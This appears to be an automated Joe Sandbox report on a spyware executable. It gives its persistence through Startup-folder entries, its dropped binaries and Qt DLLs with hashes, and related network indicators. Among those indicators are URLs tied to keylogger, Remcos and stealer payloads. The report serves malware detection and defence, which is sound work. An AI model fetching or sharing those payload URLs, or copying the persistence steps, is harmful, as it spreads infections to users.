Original Sample Name:	abe7cc92554b2defc6c336d5cafabe798f1f6c75076ccce897d6337fdbc42fd5.exe
Detection:	MAL
Classification:	mal100.spyw.expl.evad.winEXE@20/31@1/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 88% Number of executed functions: 39 Number of non-executed functions: 275
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, consent.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ActiveISO.exe, PID 1792 because there are no executed function
Execution Graph export aborted for target ActiveISO.exe, PID 5876 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: TVr2Z822J3.exe

Simulations

Behavior and APIs

Time	Type	Description
15:55:48	API Interceptor	1x Sleep call for process: cmd.exe modified
15:55:50	API Interceptor	15x Sleep call for process: UploadAlt_Ti.exe modified
21:55:35	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT5884.tmp
21:55:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fmDaemonhfr.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm	Get hash	malicious	Unknown	Browse	f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/YU1NN
	TT copy.exe	Get hash	malicious	FormBook	Browse	www.lnnn.fun/u5w9/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/iiEh1iM3/download
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/dc8Ru
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/LOToW
	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	qegyhig.com/login.php
	7ObLFE2iMK.exe	Get hash	malicious	Simda Stealer	Browse	lysyvan.com/login.php
	UMwpXhA46R.exe	Get hash	malicious	Simda Stealer	Browse	lysyvan.com/login.php
	1fWgBXPgiT.exe	Get hash	malicious	Simda Stealer	Browse	lysyvan.com/login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sirnisirlo.online	Rechnung_2024_0091.pdf.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	chelentano.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.80.55
	file.exe	Get hash	malicious	Unknown	Browse	104.21.71.28
	file.exe	Get hash	malicious	Unknown	Browse	104.21.71.28
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.174.133
	http://loop.net.pk/cos.html	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.17.25.14
	https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/graylinelaketahoe.com&c=E,1,BWhR2At2OZAdw2Kzdn7d-U-fLZRdgzpdTFbcA87JOQxek-SzsLBqKBG-KMVpA5JovWFRbO4mN3q2zPe1YDaTOG57b4G9v05-IgsJXqrG4om_58_65Os9ldlZ&typo=1	Get hash	malicious	Unknown	Browse	104.17.25.14
	Unit 2_week 4 2024.pptx	Get hash	malicious	HTMLPhisher	Browse	104.25.144.42
	http://samobile.net/content/offsite_article.html?url=https%3A%2F%2Fsepedatua.com%2F158983%2Fsecure-redirect%23cnichols%2Bderickdermatology.com&headline=New+Jerusalem%2C+The+by+Chesterton%2C+G.+K	Get hash	malicious	Captcha Phish	Browse	104.26.5.39
	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Nexol.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Loader.exe.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	188.114.97.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\ActiveISO.exe	Rechnung_2024_0091.pdf.lnk	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	9nobq4rqr0.exe	Get hash	malicious	Unknown	Browse
	KClGcCpDAP.exe	Get hash	malicious	Unknown	Browse
	KClGcCpDAP.exe	Get hash	malicious	Unknown	Browse
	46L03o2EOY.exe	Get hash	malicious	Unknown	Browse
	46L03o2EOY.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\ActiveISO.exe

Process:	C:\Users\user\Desktop\TVr2Z822J3.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1266616
Entropy (8bit):	6.275567294044985
Encrypted:	false
SSDEEP:	12288:RWiPQmboElHjsxc93LwnfXlP0CT7T4ir7XFXTqlj02F:5Qrat3knTvT4yDpqlj/F
MD5:	B84DFABE933D1160F624693D94779CE5
SHA1:	AC0133C09708FE4A3C626E3BA4CDF44D3A0E065F
SHA-256:	588CB61B36A001384A2833BD5DF8D7982CA79D6AE17A3D83A94E01B1E79684BD
SHA-512:	EEAEEF8D6B5FA02DEDF9818BABAA4B5FFDB87300521883AA290289DCC720B3D543279085ED3FC649B74654143E678502E56EB3F92C4BAF53C075977DE33C1B0E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Rechnung_2024_0091.pdf.lnk, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........s..G..CG..CG..C.n.CF..C.n.BX..C.n.BM..C.n.BC..C.n.BA..C.L.BF..C.L.BM..CSy.BO..CNjpCS..CG..Cu..C..(CD..C.L.BQ..C.L.BM..C.o.B`..C.o.CF..CG.tCF..C.o.BF..CRichG..C........................PE..d....~.e.........."....#.....<.................@.....................................y....`.............................................................8........>...(...+...`..................................(...@...@............0...)...........................text............................... ..`.rdata..0....0......................@..@.data....w.......L..................@....pdata...>.......@...D..............@..@.rsrc...8...........................@..@.reloc.......`......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\14e011b4

Process:	C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
File Type:	data
Category:	modified
Size (bytes):	5744294
Entropy (8bit):	7.742273401416556
Encrypted:	false
SSDEEP:	98304:GEURJ067t6RrQDV4ApyS4qA8R+vVbFqj3raWqt9pueo9eO:p6J0SSrQZlATJ2SpxBO
MD5:	817AB233D4E9B8190644F5CE93D3B1F3
SHA1:	4E159A9A49039840B5C8C2419CB1ACCD5C52B927
SHA-256:	DB2608541949FCA83E986BA18E53B8DACB8896809B85BF8AE1C21DF409891282
SHA-512:	09FE7BC9942172973EAF155B9B637F673A47C949DF70F6C544E2129F788BE8B662987F112CD645D107C6873D130E4A79E0A24DBAE5FCB19A72092C86A42364AB
Malicious:	false
Preview:	.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................US.UW..HN.fl..rw.}m..cp.`b..4N.a_.{d..yp.`b..as..............................................{J.`j.}y.l.......................................................................................{@..uw.zp..z`......................................................................................CJ.]Q..Yj.{p.`-.@_.un.{q......................................................................&-..!3..#..........................................

C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	2364728
Entropy (8bit):	6.606009669324617
Encrypted:	false
SSDEEP:	49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
MD5:	967F4470627F823F4D7981E511C9824F
SHA1:	416501B096DF80DDC49F4144C3832CF2CADB9CB2
SHA-256:	B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
SHA-512:	8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 9nobq4rqr0.exe, Detection: malicious, Browse Filename: KClGcCpDAP.exe, Detection: malicious, Browse Filename: KClGcCpDAP.exe, Detection: malicious, Browse Filename: 46L03o2EOY.exe, Detection: malicious, Browse Filename: 46L03o2EOY.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o\|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................\|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\c92d621

Process:	C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
File Type:	data
Category:	modified
Size (bytes):	5744294
Entropy (8bit):	7.742273440207441
Encrypted:	false
SSDEEP:	98304:rEURJ067t6RrQDV4ApyS4qA8R+vVbFqj3raWqt9pueo9eO:Y6J0SSrQZlATJ2SpxBO
MD5:	6D09C41C5A46D61C070AECFC8A827C1F
SHA1:	931B6289B026403EF77F6F12DBFB011B8E75C449
SHA-256:	90B725A06252D8A0346C63C9745AEBC00100E6C177BA3D082E6DCAACB65B05A5
SHA-512:	3ECCFE6D2A1BA4CD35B52995C36D2F9CE95595F2018FEB90ABB71C835AF79E7164BF508038EBB2004C908C3D4E52D5CD64C2CE285797CD0BCA76E8E01CDDB4D9
Malicious:	false
Preview:	.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................US.UW..HN.fl..rw.}m..cp.`b..4N.a_.{d..yp.`b..as..............................................{J.`j.}y.l.......................................................................................{@..uw.zp..z`......................................................................................CJ.]Q..Yj.{p.`-.@_.un.{q......................................................................&-..!3..#..........................................

C:\Users\user\AppData\Local\Temp\f4c659c6

Process:	C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe
File Type:	data
Category:	modified
Size (bytes):	5744294
Entropy (8bit):	7.742273463744664
Encrypted:	false
SSDEEP:	98304:dEURJ067t6RrQDV4ApyS4qA8R+vVbFqj3raWqt9pueo9eO:S6J0SSrQZlATJ2SpxBO
MD5:	999DD48C573FBD7D94A54760A168E42A
SHA1:	E509F0ACFE84F065FCC3A6B0AE5A81AE237CABD1
SHA-256:	07C14D4688B05C3117C01F78F88E2BF775EDF2B2093A0FB334BDB466C34CC750
SHA-512:	46ED4E2C0D3D18EA36CE9A974618B8520C09F331E394F04AF520F240107CBFA6E11AA36BCF7B9721A7BB3EE64C8E97841DE4FEFBDAF04A5257DCF791F61E283E
Malicious:	false
Preview:	.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................US.UW..HN.fl..rw.}m..cp.`b..4N.a_.{d..yp.`b..as..............................................{J.`j.}y.l.......................................................................................{@..uw.zp..z`......................................................................................CJ.]Q..Yj.{p.`-.@_.un.{q......................................................................&-..!3..#..........................................

C:\Users\user\AppData\Local\Temp\itpyyyx

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	modified
Size (bytes):	2647040
Entropy (8bit):	6.737542749825899
Encrypted:	false
SSDEEP:	49152:2gIVhybLGbJ59ppA4z66v2VxSY/Rla1Biw1vPaCreD5iVB0J97t2ma0BEbfBAJcn:2nrV/Ay2lE2vHA
MD5:	871F98EAF7C9A4A6074ACF0F0B78B7E5
SHA1:	1EC94386CD6ACB3EF0C9CE61806EADF1C2EE02E5
SHA-256:	4457F18AB3374B760942A7443A7D9001B748B1A87813B78A5C89D0CABD6C0331
SHA-512:	6B4CD3305D6F748C17D0F19C8CF25CE3098717A6453AEA8D132C10DEAFCAC569D3570B723A34C888A74E505A73F65341492185595B48E6D71606EA5B62028007
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...i..Y..................%..P(..b..W..........@.............................@/.....L.(...`... ......................................................./.8.....'..i........... /............................. .'.(...................X................................text.....%.......%.................`..`.data.........%.......%.............@....rdata..(.....'.......&.............@..@.pdata...i....'..j....'.............@..@.xdata...R....(..T....'.............@..@.bss.... a...p(..........................idata...............D(.............@....CRT....0............J(.............@....tls........../......L(.............@....rsrc...8...../......N(.............@..@.reloc....... /......P(.............@..Bhwn..........0/......T(.............@...................................................................................................................................

C:\Users\user\AppData\Local\Temp\josveh

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2647040
Entropy (8bit):	6.737542749825899
Encrypted:	false
SSDEEP:	49152:2gIVhybLGbJ59ppA4z66v2VxSY/Rla1Biw1vPaCreD5iVB0J97t2ma0BEbfBAJcn:2nrV/Ay2lE2vHA
MD5:	871F98EAF7C9A4A6074ACF0F0B78B7E5
SHA1:	1EC94386CD6ACB3EF0C9CE61806EADF1C2EE02E5
SHA-256:	4457F18AB3374B760942A7443A7D9001B748B1A87813B78A5C89D0CABD6C0331
SHA-512:	6B4CD3305D6F748C17D0F19C8CF25CE3098717A6453AEA8D132C10DEAFCAC569D3570B723A34C888A74E505A73F65341492185595B48E6D71606EA5B62028007
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...i..Y..................%..P(..b..W..........@.............................@/.....L.(...`... ......................................................./.8.....'..i........... /............................. .'.(...................X................................text.....%.......%.................`..`.data.........%.......%.............@....rdata..(.....'.......&.............@..@.pdata...i....'..j....'.............@..@.xdata...R....(..T....'.............@..@.bss.... a...p(..........................idata...............D(.............@....CRT....0............J(.............@....tls........../......L(.............@....rsrc...8...../......N(.............@..@.reloc....... /......P(.............@..Bhwn..........0/......T(.............@...................................................................................................................................

C:\Users\user\AppData\Local\Temp\qrdbuq

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 14 17:56:09 2024, mtime=Thu Nov 14 17:56:10 2024, atime=Wed Nov 13 08:57:16 2024, length=1266616, window=hide
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.982363829982808
Encrypted:	false
SSDEEP:	12:8ZS1B64oo0N+2Chj55i1Y//8PCLIq2zafxgjEjA/NHUuMkXg1MJMag+M8JI8JzBc:8ZSPNB2O59ucT2euUAKBoBg+HJzJtm
MD5:	73C3022C1FA195DB411BA5E7FFBB9131
SHA1:	4DAE28903CEFC2FCD812205B70689A69E65FD075
SHA-256:	45F6A3CCA7D68DC2C3421F2ADA2916E0B4958CA793AC1179566527DF305D59E9
SHA-512:	9C82F31E337ABF15B6F5E374ADE9D9FDFEE010328013988C82DA9F0292AB017F1CC2AC1AFBCB6C0812C52A5A53B0D7F09F0D1281BC61953B18776B4748C8F3BC
Malicious:	false
Preview:	L..................F.... ....MN..6...o...6...&hk.5...S........................:..DG..Yr?.D..U..k0.&...&......Qg._...d)c..6...=Z..6......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=nY............................3N.A.p.p.D.a.t.a...B.V.1.....nY....Roaming.@......EW.=nY............................`s..R.o.a.m.i.n.g.....d.1.....nY....UPLOAD~1..L......nY..nY......z!........................U.p.l.o.a.d.H.o.s.t._.U.W.....h.2..S..mY(O .ACTIVE~1.EXE..L......nY..nY.......!........................A.c.t.i.v.e.I.S.O...e.x.e.......m...............-.......l...........O*#%.....C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe..A.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.U.p.l.o.a.d.H.o.s.t._.U.W.\.A.c.t.i.v.e.I.S.O...e.x.e.`.......X.......216865...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe

Process:	C:\Users\user\ActiveISO.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1266616
Entropy (8bit):	6.275567294044985
Encrypted:	false
SSDEEP:	12288:RWiPQmboElHjsxc93LwnfXlP0CT7T4ir7XFXTqlj02F:5Qrat3knTvT4yDpqlj/F
MD5:	B84DFABE933D1160F624693D94779CE5
SHA1:	AC0133C09708FE4A3C626E3BA4CDF44D3A0E065F
SHA-256:	588CB61B36A001384A2833BD5DF8D7982CA79D6AE17A3D83A94E01B1E79684BD
SHA-512:	EEAEEF8D6B5FA02DEDF9818BABAA4B5FFDB87300521883AA290289DCC720B3D543279085ED3FC649B74654143E678502E56EB3F92C4BAF53C075977DE33C1B0E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........s..G..CG..CG..C.n.CF..C.n.BX..C.n.BM..C.n.BC..C.n.BA..C.L.BF..C.L.BM..CSy.BO..CNjpCS..CG..Cu..C..(CD..C.L.BQ..C.L.BM..C.o.B`..C.o.CF..CG.tCF..C.o.BF..CRichG..C........................PE..d....~.e.........."....#.....<.................@.....................................y....`.............................................................8........>...(...+...`..................................(...@...@............0...)...........................text............................... ..`.rdata..0....0......................@..@.data....w.......L..................@....pdata...>.......@...D..............@..@.rsrc...8...........................@..@.reloc.......`......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Core.dll

Process:	C:\Users\user\ActiveISO.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6133880
Entropy (8bit):	6.6556462442857764
Encrypted:	false
SSDEEP:	98304:8TjAe4iOtBel1xJsv6tWKFdu9C0eo74QerqfAR:8TjAetoBEJsv6tWKFdu9C017derqfAR
MD5:	8C735052A2D4E9B01B0E028F0C20F67C
SHA1:	B72BDE11DE3310A495DD16520362F4ADBF21717A
SHA-256:	D751AB0357F71586B1793CE4166295ABA085334647D6E3FFCD49287A801273E7
SHA-512:	0BBD920E1B48361C7F3E1540DDB12FA6C9146BFE36E13EBA2B2E6CA8BF3AD961D88121C6F70ECA6D9EA413900455E696F7233C5BB54415CA7D2C9C1C0D4C1FB3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............]...]...]..@]...]...\...]9l.]...]...\...]...\...]...\...]..\...]..\...]...]...]0..\...]0..\W..]0..\...]5.,]...]..D]...]0..\...]Rich...]................PE..d.....n].........." ......-.../.....$",......................................@^......-^...`...........................................S.......Z.......^......`[..q....].x.....^.."....L.T.....................L.(...p.L..............................................text.....-.......-................. ..`.rdata....,.......,...-.............@..@.data.........Z..P....Z.............@....pdata...q...`[..r....Z.............@..@.tls..........]......T].............@....gfids..,.....]......V].............@..@.rsrc.........^......X].............@..@.reloc..."....^..$...^].............@..B................................................................................................................................

C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Gui.dll

Process:	C:\Users\user\ActiveISO.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6494840
Entropy (8bit):	6.661788186831622
Encrypted:	false
SSDEEP:	49152:Olbw69/oyRlQ3bseHmQL7cE6Vvz4IBeEsBvf6MGde7l8UkqolD/SrneTbfrh4y+8:Olbw6a6GpcZsBv6szezn9IPRs9
MD5:	34893CB3D9A2250F0EDECD68AEDB72C7
SHA1:	37161412DF2C1313A54749FE6F33E4DBF41D128A
SHA-256:	CA8334B2E63BC01F0749AFEB9E87943C29882131EFE58608EA25732961B2DF34
SHA-512:	484E32832D69EC1799BD1BCC694418801C443C732ED59ECD76B3F67ABF0B1C97D64AE123728DFA99013DF846BA45BE310502EF6F8DA42155DA2E89F2A1E8CB2C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Ke[...5...5...5..\|....5......5.4Z6...5.4Z1...5.4Z4...5.4Z0...5.\|f4...5..Z4...5...4...5..Z1...5..Z0.W.5..Z5...5..Z...5.......5..Z7...5.Rich..5.................PE..d...>.n].........." .....f9...)......Z9.......................................c.......c...`.........................................`.C.<.....\.@.....c......._.<.....c.x.....c..,..0r?.T...................(s?.(....r?...............9../...........................text...be9......f9................. ..`.rdata...b$...9..d$..j9.............@..@.data........]..T....].............@....pdata..<....._......"_.............@..@.gfids..4....`c.......b.............@..@.tls.........pc.......b.............@....rsrc.........c.......b.............@..@.reloc...,....c.......b.............@..B................................................................................................................................

C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Network.dll

Process:	C:\Users\user\ActiveISO.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1314424
Entropy (8bit):	6.382115484562211
Encrypted:	false
SSDEEP:	24576:txQym4jK56LNWz/m7iNBd3ol84iKiEanXC:t1mrCNxiNBulliKiEaXC
MD5:	FE5ED4C5DA03077F98C3EFA91ECEFD81
SHA1:	E23E839EC0602662788F761EBE7DD4B39C018A7F
SHA-256:	D992AAEB21CB567113126C2912CF75E892C8E3EAD5D50147A11ABE704B9E2E2B
SHA-512:	22514732A0EDF8FC2B8770139599132429080B86D2844143D21BB834CBDDAAA077D763969960E39E2050A69493C1AAE191600E5DF6107BDE90FAE589A054F071
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y?1.8Qb.8Qb.8Qb.@.b.8Qb.fRc.8Qb.fUc.8Qb.fPc.8Qb.fTc.8Qb.ZPc.8Qb.fPc.8Qb.8Pb`;Qb.fTc.8Qb.fQc.8Qb.f.b.8Qb.8.b.8Qb.fSc.8QbRich.8Qb........PE..d.....n].........." .........z...............................................`............`......................................... ...._...#..,....0....... ..T.......x....@.........T......................(...0................... ............................text...7........................... ..`.rdata...=.......>..................@..@.data....4......."..................@....pdata..T.... ......................@..@.gfids..4...........................@..@.tls......... ......................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................

C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5PrintSupport.dll

Process:	C:\Users\user\ActiveISO.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	324216
Entropy (8bit):	6.424811123526958
Encrypted:	false
SSDEEP:	6144:n5BVjwbCL85ofdeA2aqWs+41FwneMKAaol1cafGR27M1ffqp+1eszZnDy4SA:nBjwE8aVK
MD5:	D0634933DB2745397A603D5976BEE8E7
SHA1:	DDEC98433BCFEC1D9E38557D803BC73E1FF883B6
SHA-256:	7D91D3D341DBBA568E2D19382E9D58A42A0D78064C3AD7ADFE3C7BB14742C2B1
SHA-512:	9271370CD22115F68BD62572640525E086A05D75F5BC768F06E20B90B48A182F29A658A07099C7BC1E99BF0FFCF1229709524E2AF6745D6FED7B41C1ADDD09F1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........r.....}...}...}.k.}...}.M.\|...}.M.\|...}.M.\|...}.M.\|...}.q.\|...}zM.\|...}...}...}zM.\|...}zM.\|...}.Mc}...}...}...}zM.\|...}Rich...}................PE..d....n].........." .........................................................0.......H....`..........................................M...p.......................&......x.... ..@.......T.......................(.......................P"...........................text............................... ..`.rdata..............................@..@.data...............................@....pdata...&.......(..................@..@.gfids..4...........................@..@.tls................................@....rsrc...............................@..@.reloc..@.... ......................@..B................................................................................................................................................

C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Widgets.dll

Process:	C:\Users\user\ActiveISO.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5539448
Entropy (8bit):	6.61165878012579
Encrypted:	false
SSDEEP:	98304:oSIq7lPpagrGUtPm3qBF+1jIJJAi+eVq8:oSI8hagrGUtPm3KMRIL+e/
MD5:	C502BB8A4A7DC3724AB09292CD3C70D6
SHA1:	FF44FDDEEC2D335EC0EAA861714B561F899675FD
SHA-256:	4266918226C680789D49CF2407A7FEC012B0ED872ADAFB84C7719E645F9B2E6D
SHA-512:	73BEF89503CE032FBA278876B7DAB9EAC275632DF7A72C77093D433C932272DA997E8FBEB431A09D84BAAC7B2AB2E55222FF687893311949A5603E738BFA6617
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;....b..b..b.v.H.wb.D<.\|b.D<.ub.D<.{b.D<.hb....ub..<.zb..b.no..<..b..<.~b..<$.~b..bL.~b..<.~b.Rich.b.................PE..d.....n].........." ......3... .......3.......................................T......4U...`......................................... .D.TQ..t>M......@T.......P..e...pT.x....PT.... =@.T....................>@.(....=@...............4..h...........................text.....3.......3................. ..`.rdata........4.......4.............@..@.data........P..~....O.............@....pdata...e....P..f...rP.............@..@.gfids..4.... T.......S.............@..@.tls.........0T.......S.............@....rsrc........@T.......S.............@..@.reloc......PT.......S.............@..B................................................................................................................................................

C:\Users\user\AppData\Roaming\UploadHost_UW\StarBurn.dll

Process:	C:\Users\user\ActiveISO.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1505376
Entropy (8bit):	6.361832549375939
Encrypted:	false
SSDEEP:	24576:NbKpao+9Uybarjs1FHw9guJfkTK39MOCRZnVVWjk+amEObzznf9:NbKpaGEw9diEjkuEObzznf9
MD5:	41E19BA2364F2C834B2487E1D02BB99A
SHA1:	6C61D603DDDFE384A93AD33775B70681D0A396D9
SHA-256:	C040A25377028B0C28DB81A012DE786C803A0E9D6F87CE460335A621D31F5340
SHA-512:	6EBF4A9E80F16C6A03FF357D2DA9A34A4227BFD65EB66D1D335349A77BA066D069BA0D47D46229B3C77B59052C42D388678662F970B418D8CC3CFB1223427D8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
